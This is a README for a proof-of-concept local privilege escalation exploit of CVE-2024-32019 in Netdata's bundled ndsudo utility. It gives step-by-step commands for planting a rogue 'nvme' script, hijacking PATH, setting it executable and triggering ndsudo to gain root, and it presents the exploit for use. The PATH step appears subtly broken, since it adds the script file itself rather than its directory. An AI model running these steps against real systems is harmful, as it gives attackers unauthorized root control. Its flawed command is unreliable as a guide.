This is an alternative poc for the CVE-2024-32019 written in python # Privilege Escalation via `ndsudo` (Netdata Local Exploit)
This is an alternative POC to exploit a vulnerable `ndsudo` utility bundled with Netdata to perform a local privilege escalation.
The exploit works by adding the script inside the user’s `PATH` substituting an allowed command (`nvme`) by `ndsudo` and execute it as root.
---
## Prerequisites & Assumptions :scroll:
- **Local shell access** on the target system.
- Python3 on the target machine
- Possibilty to execute the `ndsudo` command.
---
## Steps
### 1. Script :hammer:
You can either create or upload the script directly to the target machine as long as it's called as one of the allowed commands.
To check the allowed commands by `ndsudo` just launch `ndsudo --help`.
For this poc we'll use the command `nvme-list`, so the script will be called `nvme`.
---
### 2. PATH injection :syringe:
Once the script has been created and named after an allowed command by `ndsudo` we need to inject it at the beginning of the `PATH` variable so it will be the first one to be found and executed
```bash
export PATH="/tmp/nvme:$PATH"
```
---
### 3. Execution permissions :gun:
Obviusly the script needs to have execution permissions
```bash
chmod +x /tmp/nvme
```
---
### 4. Trigger the Exploit :boom:
Once everything is set up, just launch `ndsudo` with the rogue script and you're root.
```bash
ndsudo nvme-list
```
---
## Resources :books:
- Netdata Github Advisory: https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93
Hack responsibly :skull:
登录后查看神龙缓存的 POC 文件快照
登录查看